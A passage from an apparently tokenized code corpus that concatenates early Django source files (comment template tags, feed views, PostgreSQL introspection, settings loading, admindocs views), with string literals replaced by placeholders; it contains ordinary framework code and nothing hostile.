<EOL> ( '<STR_LIT>' , PHOTOS_OPTIONAL ) , <EOL> ( '<STR_LIT>' , RATINGS_REQUIRED ) , <EOL> ( '<STR_LIT>' , RATINGS_OPTIONAL ) , <EOL> ( '<STR_LIT>' , IS_PUBLIC ) ) : <EOL> context [ var ] = getattr ( self , var ) <EOL> if getattr ( self , var ) : <EOL> options . append ( abbr ) <EOL> context [ '<STR_LIT>' ] = '<STR_LIT:U+002C>' . join ( options ) <EOL> if self . free : <EOL> context [ '<STR_LIT>' ] = Comment . objects . get_security_hash ( context [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' , context [ '<STR_LIT:target>' ] ) <EOL> default_form = loader . get_template ( FREE_COMMENT_FORM ) <EOL> else : <EOL> context [ '<STR_LIT>' ] = self . photo_options <EOL> context [ '<STR_LIT>' ] = normalize_newlines ( base64 . encodestring ( self . rating_options ) . strip ( ) ) <EOL> if self . rating_options : <EOL> context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] = Comment . objects . get_rating_options ( self . rating_options ) <EOL> context [ '<STR_LIT>' ] = Comment . objects . get_security_hash ( context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] , context [ '<STR_LIT:target>' ] ) <EOL> default_form = loader . get_template ( COMMENT_FORM ) <EOL> output = default_form . render ( context ) <EOL> context . pop ( ) <EOL> return output <EOL> class CommentCountNode ( template . Node ) : <EOL> def __init__ ( self , package , module , context_var_name , obj_id , var_name , free ) : <EOL> self . package , self . module = package , module <EOL> self . context_var_name , self . obj_id = context_var_name , obj_id <EOL> self . var_name , self . free = var_name , free <EOL> def render ( self , context ) : <EOL> from django . conf import settings <EOL> manager = self . free and FreeComment . objects or Comment . objects <EOL> if self . context_var_name is not None : <EOL> self . obj_id = template . resolve_variable ( self . context_var_name , context ) <EOL> comment_count = manager . filter ( object_id__exact = self . obj_id , <EOL> content_type__app_label__exact = self . package , <EOL> content_type__model__exact = self . module , site__id__exact = settings . SITE_ID ) . count ( ) <EOL> context [ self . var_name ] = comment_count <EOL> return '<STR_LIT>' <EOL> class CommentListNode ( template . Node ) : <EOL> def __init__ ( self , package , module , context_var_name , obj_id , var_name , free , ordering , extra_kwargs = None ) : <EOL> self . package , self . module = package , module <EOL> self . context_var_name , self . obj_id = context_var_name , obj_id <EOL> self . var_name , self . free = var_name , free <EOL> self . ordering = ordering <EOL> self . extra_kwargs = extra_kwargs or { } <EOL> def render ( self , context ) : <EOL> from django . conf import settings <EOL> get_list_function = self . free and FreeComment . objects . filter or Comment . objects . get_list_with_karma <EOL> if self . context_var_name is not None : <EOL> try : <EOL> self . obj_id = template . resolve_variable ( self . context_var_name , context ) <EOL> except template . VariableDoesNotExist : <EOL> return '<STR_LIT>' <EOL> kwargs = { <EOL> '<STR_LIT>' : self . obj_id , <EOL> '<STR_LIT>' : self . package , <EOL> '<STR_LIT>' : self . module , <EOL> '<STR_LIT>' : settings . SITE_ID , <EOL> } <EOL> kwargs . update ( self . extra_kwargs ) <EOL> if not self . free and settings . COMMENTS_BANNED_USERS_GROUP : <EOL> kwargs [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' % settings . COMMENTS_BANNED_USERS_GROUP } <EOL> comment_list = get_list_function ( ** kwargs ) . order_by ( self . ordering + '<STR_LIT>' ) . select_related ( ) <EOL> if not self . free : <EOL> if context . has_key ( '<STR_LIT:user>' ) and context [ '<STR_LIT:user>' ] . is_authenticated ( ) : <EOL> user_id = context [ '<STR_LIT:user>' ] . id <EOL> context [ '<STR_LIT>' ] = Comment . objects . user_is_moderator ( context [ '<STR_LIT:user>' ] ) <EOL> else : <EOL> user_id = None <EOL> context [ '<STR_LIT>' ] = False <EOL> if settings . COMMENTS_BANNED_USERS_GROUP : <EOL> comment_list = [ c for c in comment_list if not c . is_hidden or ( user_id == c . user_id ) ] <EOL> context [ self . var_name ] = comment_list <EOL> return '<STR_LIT>' <EOL> class DoCommentForm : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , free ) : <EOL> self . free = free <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if tokens [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> package , module = tokens [ <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> content_type = ContentType . objects . get ( app_label__exact = package , model__exact = module ) <EOL> except ContentType . DoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , package , module ) <EOL> obj_id_lookup_var , obj_id = None , None <EOL> if tokens [ <NUM_LIT:3> ] . isdigit ( ) : <EOL> obj_id = tokens [ <NUM_LIT:3> ] <EOL> try : <EOL> content_type . get_object_for_this_type ( pk = obj_id ) <EOL> except ObjectDoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , content_type . name , obj_id ) <EOL> else : <EOL> obj_id_lookup_var = tokens [ <NUM_LIT:3> ] <EOL> kwargs = { } <EOL> if len ( tokens ) > <NUM_LIT:4> : <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> for option , args in zip ( tokens [ <NUM_LIT:5> : : <NUM_LIT:2> ] , tokens [ <NUM_LIT:6> : : <NUM_LIT:2> ] ) : <EOL> if option in ( '<STR_LIT>' , '<STR_LIT>' ) and not self . free : <EOL> option_list = args . split ( '<STR_LIT:U+002C>' ) <EOL> if len ( option_list ) % <NUM_LIT:3> != <NUM_LIT:0> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> for opt in option_list [ : : <NUM_LIT:3> ] : <EOL> if not opt . isalnum ( ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , opt ) <EOL> for opt in option_list [ <NUM_LIT:1> : : <NUM_LIT:3> ] + option_list [ <NUM_LIT:2> : : <NUM_LIT:3> ] : <EOL> if not opt . isdigit ( ) or not ( MIN_PHOTO_DIMENSION <= int ( opt ) <= MAX_PHOTO_DIMENSION ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , opt , MIN_PHOTO_DIMENSION , MAX_PHOTO_DIMENSION ) <EOL> kwargs [ option ] = True <EOL> kwargs [ '<STR_LIT>' ] = args <EOL> elif option in ( '<STR_LIT>' , '<STR_LIT>' ) and not self . free : <EOL> if <NUM_LIT:2> < len ( args . split ( '<STR_LIT:|>' ) ) > <NUM_LIT:9> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( option , tokens [ <NUM_LIT:0> ] ) <EOL> if re . match ( '<STR_LIT>' , args . split ( '<STR_LIT:|>' ) [ <NUM_LIT:0> ] ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , option ) <EOL> kwargs [ option ] = True <EOL> kwargs [ '<STR_LIT>' ] = args <EOL> elif option in ( '<STR_LIT>' ) : <EOL> kwargs [ option ] = ( args == '<STR_LIT:true>' ) <EOL> else : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , option ) <EOL> return CommentFormNode ( content_type , obj_id_lookup_var , obj_id , self . free , ** kwargs ) <EOL> class DoCommentCount : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , free ) : <EOL> self . free = free <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) != <NUM_LIT:6> : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if tokens [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> package , module = tokens [ <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> content_type = ContentType . objects . get ( app_label__exact = package , model__exact = module ) <EOL> except ContentType . DoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , package , module ) <EOL> var_name , obj_id = None , None <EOL> if tokens [ <NUM_LIT:3> ] . isdigit ( ) : <EOL> obj_id = tokens [ <NUM_LIT:3> ] <EOL> try : <EOL> content_type . get_object_for_this_type ( pk = obj_id ) <EOL> except ObjectDoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , content_type . name , obj_id ) <EOL> else : <EOL> var_name = tokens [ <NUM_LIT:3> ] <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> return CommentCountNode ( package , module , var_name , obj_id , tokens [ <NUM_LIT:5> ] , self . free ) <EOL> class DoGetCommentList : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , free ) : <EOL> self . free = free <EOL> def __call__ ( self , parser , token ) : <EOL> tokens = token . contents . split ( ) <EOL> if not len ( tokens ) in ( <NUM_LIT:6> , <NUM_LIT:7> ) : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if tokens [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> package , module = tokens [ <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> try : <EOL> content_type = ContentType . objects . get ( app_label__exact = package , model__exact = module ) <EOL> except ContentType . DoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , package , module ) <EOL> var_name , obj_id = None , None <EOL> if tokens [ <NUM_LIT:3> ] . isdigit ( ) : <EOL> obj_id = tokens [ <NUM_LIT:3> ] <EOL> try : <EOL> content_type . get_object_for_this_type ( pk = obj_id ) <EOL> except ObjectDoesNotExist : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % ( tokens [ <NUM_LIT:0> ] , content_type . name , obj_id ) <EOL> else : <EOL> var_name = tokens [ <NUM_LIT:3> ] <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> if len ( tokens ) == <NUM_LIT:7> : <EOL> if tokens [ <NUM_LIT:6> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError , "<STR_LIT>" % tokens [ <NUM_LIT:0> ] <EOL> ordering = "<STR_LIT:->" <EOL> else : <EOL> ordering = "<STR_LIT>" <EOL> return CommentListNode ( package , module , var_name , obj_id , tokens [ <NUM_LIT:5> ] , self . free , ordering ) <EOL> register . tag ( '<STR_LIT>' , DoGetCommentList ( False ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentForm ( False ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentCount ( False ) ) <EOL> register . tag ( '<STR_LIT>' , DoGetCommentList ( True ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentForm ( True ) ) <EOL> register . tag ( '<STR_LIT>' , DoCommentCount ( True ) ) </s>
<s> from django . contrib . syndication import feeds <EOL> from django . http import HttpResponse , Http404 <EOL> def feed ( request , url , feed_dict = None ) : <EOL> if not feed_dict : <EOL> raise Http404 , "<STR_LIT>" <EOL> try : <EOL> slug , param = url . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> slug , param = url , '<STR_LIT>' <EOL> try : <EOL> f = feed_dict [ slug ] <EOL> except KeyError : <EOL> raise Http404 , "<STR_LIT>" % slug <EOL> try : <EOL> feedgen = f ( slug , request . path ) . get_feed ( param ) <EOL> except feeds . FeedDoesNotExist : <EOL> raise Http404 , "<STR_LIT>" % slug <EOL> response = HttpResponse ( mimetype = feedgen . mime_type ) <EOL> feedgen . write ( response , '<STR_LIT:utf-8>' ) <EOL> return response </s>
<s> from django . template . loader import * </s>
<s> from django . db . backends . postgresql . base import quote_name <EOL> def get_table_list ( cursor ) : <EOL> "<STR_LIT>" <EOL> cursor . execute ( """<STR_LIT>""" ) <EOL> return [ row [ <NUM_LIT:0> ] for row in cursor . fetchall ( ) ] <EOL> def get_table_description ( cursor , table_name ) : <EOL> "<STR_LIT>" <EOL> cursor . execute ( "<STR_LIT>" % quote_name ( table_name ) ) <EOL> return cursor . description <EOL> def get_relations ( cursor , table_name ) : <EOL> """<STR_LIT>""" <EOL> cursor . execute ( """<STR_LIT>""" , [ table_name ] ) <EOL> relations = { } <EOL> for row in cursor . fetchall ( ) : <EOL> try : <EOL> relations [ int ( row [ <NUM_LIT:0> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) - <NUM_LIT:1> ] = ( int ( row [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) - <NUM_LIT:1> , row [ <NUM_LIT:2> ] ) <EOL> except ValueError : <EOL> continue <EOL> return relations <EOL> def get_indexes ( cursor , table_name ) : <EOL> """<STR_LIT>""" <EOL> cursor . execute ( """<STR_LIT>""" , [ table_name ] ) <EOL> indexes = { } <EOL> for row in cursor . fetchall ( ) : <EOL> if '<STR_LIT:U+0020>' in row [ <NUM_LIT:1> ] : <EOL> continue <EOL> indexes [ row [ <NUM_LIT:0> ] ] = { '<STR_LIT:primary_key>' : row [ <NUM_LIT:3> ] , '<STR_LIT>' : row [ <NUM_LIT:2> ] } <EOL> return indexes <EOL> DATA_TYPES_REVERSE = { <EOL> <NUM_LIT:16> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> def function ( receiver ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( receiver , '<STR_LIT>' ) : <EOL> if hasattr ( receiver . __call__ , '<STR_LIT>' ) or hasattr ( receiver . __call__ , '<STR_LIT>' ) : <EOL> receiver = receiver . __call__ <EOL> if hasattr ( receiver , '<STR_LIT>' ) : <EOL> return receiver , receiver . im_func . func_code , <NUM_LIT:1> <EOL> elif not hasattr ( receiver , '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' % ( receiver , type ( receiver ) ) ) <EOL> return receiver , receiver . func_code , <NUM_LIT:0> <EOL> def robustApply ( receiver , * arguments , ** named ) : <EOL> """<STR_LIT>""" <EOL> receiver , codeObject , startIndex = function ( receiver ) <EOL> acceptable = codeObject . co_varnames [ startIndex + len ( arguments ) : codeObject . co_argcount ] <EOL> for name in codeObject . co_varnames [ startIndex : startIndex + len ( arguments ) ] : <EOL> if named . has_key ( name ) : <EOL> raise TypeError ( <EOL> """<STR_LIT>""" % ( <EOL> name , receiver , <EOL> ) <EOL> ) <EOL> if not ( codeObject . co_flags & <NUM_LIT:8> ) : <EOL> for arg in named . keys ( ) : <EOL> if arg not in acceptable : <EOL> del named [ arg ] <EOL> return receiver ( * arguments , ** named ) </s>
<s> try : <EOL> from pkg_resources import resource_string <EOL> except ImportError : <EOL> resource_string = None <EOL> from django . template import TemplateDoesNotExist <EOL> from django . conf import settings <EOL> def load_template_source ( template_name , template_dirs = None ) : <EOL> """<STR_LIT>""" <EOL> if resource_string is not None : <EOL> pkg_name = '<STR_LIT>' + template_name <EOL> for app in settings . INSTALLED_APPS : <EOL> try : <EOL> return ( resource_string ( app , pkg_name ) , '<STR_LIT>' % ( app , pkg_name ) ) <EOL> except : <EOL> pass <EOL> raise TemplateDoesNotExist , template_name <EOL> load_template_source . is_usable = resource_string is not None </s>
<s> """<STR_LIT>""" <EOL> import sre_parse , sre_compile , sre_constants <EOL> from sre_constants import BRANCH , SUBPATTERN <EOL> from re import VERBOSE , MULTILINE , DOTALL <EOL> import re <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> FLAGS = ( VERBOSE | MULTILINE | DOTALL ) <EOL> class Scanner ( object ) : <EOL> def __init__ ( self , lexicon , flags = FLAGS ) : <EOL> self . actions = [ None ] <EOL> s = sre_parse . Pattern ( ) <EOL> s . flags = flags <EOL> p = [ ] <EOL> for idx , token in enumerate ( lexicon ) : <EOL> phrase = token . pattern <EOL> try : <EOL> subpattern = sre_parse . SubPattern ( s , <EOL> [ ( SUBPATTERN , ( idx + <NUM_LIT:1> , sre_parse . parse ( phrase , flags ) ) ) ] ) <EOL> except sre_constants . error : <EOL> raise <EOL> p . append ( subpattern ) <EOL> self . actions . append ( token ) <EOL> p = sre_parse . SubPattern ( s , [ ( BRANCH , ( None , p ) ) ] ) <EOL> self . scanner = sre_compile . compile ( p ) <EOL> def iterscan ( self , string , idx = <NUM_LIT:0> , context = None ) : <EOL> """<STR_LIT>""" <EOL> match = self . scanner . scanner ( string , idx ) . match <EOL> actions = self . actions <EOL> lastend = idx <EOL> end = len ( string ) <EOL> while True : <EOL> m = match ( ) <EOL> if m is None : <EOL> break <EOL> matchbegin , matchend = m . span ( ) <EOL> if lastend == matchend : <EOL> break <EOL> action = actions [ m . lastindex ] <EOL> if action is not None : <EOL> rval , next_pos = action ( m , context ) <EOL> if next_pos is not None and next_pos != matchend : <EOL> matchend = next_pos <EOL> match = self . scanner . scanner ( string , matchend ) . match <EOL> yield rval , matchend <EOL> lastend = matchend <EOL> def pattern ( pattern , flags = FLAGS ) : <EOL> def decorator ( fn ) : <EOL> fn . pattern = pattern <EOL> fn . regex = re . compile ( pattern , flags ) <EOL> return fn <EOL> return decorator </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import time <EOL> from django . conf import global_settings <EOL> from django . utils . functional import LazyObject <EOL> from django . utils import importlib <EOL> ENVIRONMENT_VARIABLE = "<STR_LIT>" <EOL> class LazySettings ( LazyObject ) : <EOL> """<STR_LIT>""" <EOL> def _setup ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> settings_module = os . environ [ ENVIRONMENT_VARIABLE ] <EOL> if not settings_module : <EOL> raise KeyError <EOL> except KeyError : <EOL> raise ImportError ( "<STR_LIT>" % ENVIRONMENT_VARIABLE ) <EOL> self . _wrapped = Settings ( settings_module ) <EOL> def configure ( self , default_settings = global_settings , ** options ) : <EOL> """<STR_LIT>""" <EOL> if self . _wrapped != None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> holder = UserSettingsHolder ( default_settings ) <EOL> for name , value in options . items ( ) : <EOL> setattr ( holder , name , value ) <EOL> self . _wrapped = holder <EOL> def configured ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( self . _wrapped ) <EOL> configured = property ( configured ) <EOL> class Settings ( object ) : <EOL> def __init__ ( self , settings_module ) : <EOL> for setting in dir ( global_settings ) : <EOL> if setting == setting . upper ( ) : <EOL> setattr ( self , setting , getattr ( global_settings , setting ) ) <EOL> self . SETTINGS_MODULE = settings_module <EOL> try : <EOL> mod = importlib . import_module ( self . SETTINGS_MODULE ) <EOL> except ImportError , e : <EOL> raise ImportError ( "<STR_LIT>" % ( self . SETTINGS_MODULE , e ) ) <EOL> tuple_settings = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for setting in dir ( mod ) : <EOL> if setting == setting . upper ( ) : <EOL> setting_value = getattr ( mod , setting ) <EOL> if setting in tuple_settings and type ( setting_value ) == str : <EOL> setting_value = ( setting_value , ) <EOL> setattr ( self , setting , setting_value ) <EOL> new_installed_apps = [ ] <EOL> for app in self . INSTALLED_APPS : <EOL> if app . endswith ( '<STR_LIT>' ) : <EOL> app_mod = importlib . import_module ( app [ : - <NUM_LIT:2> ] ) <EOL> appdir = os . path . dirname ( app_mod . __file__ ) <EOL> app_subdirs = os . listdir ( appdir ) <EOL> app_subdirs . sort ( ) <EOL> name_pattern = re . compile ( r'<STR_LIT>' ) <EOL> for d in app_subdirs : <EOL> if name_pattern . match ( d ) and os . path . isdir ( os . path . join ( appdir , d ) ) : <EOL> new_installed_apps . append ( '<STR_LIT>' % ( app [ : - <NUM_LIT:2> ] , d ) ) <EOL> else : <EOL> new_installed_apps . append ( app ) <EOL> self . INSTALLED_APPS = new_installed_apps <EOL> if hasattr ( time , '<STR_LIT>' ) and getattr ( self , '<STR_LIT>' ) : <EOL> os . environ [ '<STR_LIT>' ] = self . TIME_ZONE <EOL> time . tzset ( ) <EOL> class UserSettingsHolder ( object ) : <EOL> """<STR_LIT>""" <EOL> SETTINGS_MODULE = None <EOL> def __init__ ( self , default_settings ) : <EOL> """<STR_LIT>""" <EOL> self . default_settings = default_settings <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . default_settings , name ) <EOL> def __dir__ ( self ) : <EOL> return self . __dict__ . keys ( ) + dir ( self . default_settings ) <EOL> __members__ = property ( lambda self : self . __dir__ ( ) ) <EOL> settings = LazySettings ( ) </s>
<s> DATE_FORMAT = '<STR_LIT>' <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> YEAR_MONTH_FORMAT = '<STR_LIT>' <EOL> MONTH_DAY_FORMAT = '<STR_LIT>' <EOL> SHORT_DATE_FORMAT = '<STR_LIT>' <EOL> DECIMAL_SEPARATOR = '<STR_LIT:U+002C>' <EOL> THOUSAND_SEPARATOR = '<STR_LIT:.>' </s>
<s> from django import template , templatetags <EOL> from django . template import RequestContext <EOL> from django . conf import settings <EOL> from django . contrib . admin . views . decorators import staff_member_required <EOL> from django . db import models <EOL> from django . shortcuts import render_to_response <EOL> from django . core . exceptions import ImproperlyConfigured , ViewDoesNotExist <EOL> from django . http import Http404 <EOL> from django . core import urlresolvers <EOL> from django . contrib . admindocs import utils <EOL> from django . contrib . sites . models import Site <EOL> from django . utils . importlib import import_module <EOL> from django . utils . translation import ugettext as _ <EOL> from django . utils . safestring import mark_safe <EOL> import inspect , os , re <EOL> MODEL_METHODS_EXCLUDE = ( '<STR_LIT:_>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class GenericSite ( object ) : <EOL> domain = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> def get_root_path ( ) : <EOL> try : <EOL> return urlresolvers . reverse ( '<STR_LIT>' ) <EOL> except urlresolvers . NoReverseMatch : <EOL> from django . contrib import admin <EOL> try : <EOL> return urlresolvers . reverse ( admin . site . root , args = [ '<STR_LIT>' ] ) <EOL> except urlresolvers . NoReverseMatch : <EOL> return getattr ( settings , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def doc_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> doc_index = staff_member_required ( doc_index ) <EOL> def bookmarklets ( request ) : <EOL> admin_root = get_root_path ( ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : admin_root , <EOL> '<STR_LIT>' : mark_safe ( "<STR_LIT>" % ( request . is_secure ( ) and '<STR_LIT>' or '<STR_LIT:http>' , request . get_host ( ) , admin_root ) ) , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> bookmarklets = staff_member_required ( bookmarklets ) <EOL> def template_tag_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> load_all_installed_template_libraries ( ) <EOL> tags = [ ] <EOL> app_libs = template . libraries . items ( ) <EOL> builtin_libs = [ ( None , lib ) for lib in template . builtins ] <EOL> for module_name , library in builtin_libs + app_libs : <EOL> for tag_name , tag_func in library . tags . items ( ) : <EOL> title , body , metadata = utils . parse_docstring ( tag_func . __doc__ ) <EOL> if title : <EOL> title = utils . parse_rst ( title , '<STR_LIT>' , _ ( '<STR_LIT>' ) + tag_name ) <EOL> if body : <EOL> body = utils . parse_rst ( body , '<STR_LIT>' , _ ( '<STR_LIT>' ) + tag_name ) <EOL> for key in metadata : <EOL> metadata [ key ] = utils . parse_rst ( metadata [ key ] , '<STR_LIT>' , _ ( '<STR_LIT>' ) + tag_name ) <EOL> if library in template . builtins : <EOL> tag_library = None <EOL> else : <EOL> tag_library = module_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> tags . append ( { <EOL> '<STR_LIT:name>' : tag_name , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT:body>' : body , <EOL> '<STR_LIT>' : metadata , <EOL> '<STR_LIT>' : tag_library , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : tags <EOL> } , context_instance = RequestContext ( request ) ) <EOL> template_tag_index = staff_member_required ( template_tag_index ) <EOL> def template_filter_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> load_all_installed_template_libraries ( ) <EOL> filters = [ ] <EOL> app_libs = template . libraries . items ( ) <EOL> builtin_libs = [ ( None , lib ) for lib in template . builtins ] <EOL> for module_name , library in builtin_libs + app_libs : <EOL> for filter_name , filter_func in library . filters . items ( ) : <EOL> title , body , metadata = utils . parse_docstring ( filter_func . __doc__ ) <EOL> if title : <EOL> title = utils . parse_rst ( title , '<STR_LIT>' , _ ( '<STR_LIT>' ) + filter_name ) <EOL> if body : <EOL> body = utils . parse_rst ( body , '<STR_LIT>' , _ ( '<STR_LIT>' ) + filter_name ) <EOL> for key in metadata : <EOL> metadata [ key ] = utils . parse_rst ( metadata [ key ] , '<STR_LIT>' , _ ( '<STR_LIT>' ) + filter_name ) <EOL> if library in template . builtins : <EOL> tag_library = None <EOL> else : <EOL> tag_library = module_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> filters . append ( { <EOL> '<STR_LIT:name>' : filter_name , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT:body>' : body , <EOL> '<STR_LIT>' : metadata , <EOL> '<STR_LIT>' : tag_library , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : filters <EOL> } , context_instance = RequestContext ( request ) ) <EOL> template_filter_index = staff_member_required ( template_filter_index ) <EOL> def view_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> if settings . ADMIN_FOR : <EOL> settings_modules = [ import_module ( m ) for m in settings . ADMIN_FOR ] <EOL> else : <EOL> settings_modules = [ settings ] <EOL> views = [ ] <EOL> for settings_mod in settings_modules : <EOL> urlconf = import_module ( settings_mod . ROOT_URLCONF ) <EOL> view_functions = extract_views_from_urlpatterns ( urlconf . urlpatterns ) <EOL> if Site . _meta . installed : <EOL> site_obj = Site . objects . get ( pk = settings_mod . SITE_ID ) <EOL> else : <EOL> site_obj = GenericSite ( ) <EOL> for ( func , regex ) in view_functions : <EOL> views . append ( { <EOL> '<STR_LIT:name>' : getattr ( func , '<STR_LIT>' , func . __class__ . __name__ ) , <EOL> '<STR_LIT>' : func . __module__ , <EOL> '<STR_LIT>' : settings_mod . SITE_ID , <EOL> '<STR_LIT>' : site_obj , <EOL> '<STR_LIT:url>' : simplify_regex ( regex ) , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : views <EOL> } , context_instance = RequestContext ( request ) ) <EOL> view_index = staff_member_required ( view_index ) <EOL> def view_detail ( request , view ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> mod , func = urlresolvers . get_mod_func ( view ) <EOL> try : <EOL> view_func = getattr ( import_module ( mod ) , func ) <EOL> except ( ImportError , AttributeError ) : <EOL> raise Http404 <EOL> title , body , metadata = utils . parse_docstring ( view_func . __doc__ ) <EOL> if title : <EOL> title = utils . parse_rst ( title , '<STR_LIT>' , _ ( '<STR_LIT>' ) + view ) <EOL> if body : <EOL> body = utils . parse_rst ( body , '<STR_LIT>' , _ ( '<STR_LIT>' ) + view ) <EOL> for key in metadata : <EOL> metadata [ key ] = utils . parse_rst ( metadata [ key ] , '<STR_LIT>' , _ ( '<STR_LIT>' ) + view ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT:name>' : view , <EOL> '<STR_LIT>' : title , <EOL> '<STR_LIT:body>' : body , <EOL> '<STR_LIT>' : metadata , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> view_detail = staff_member_required ( 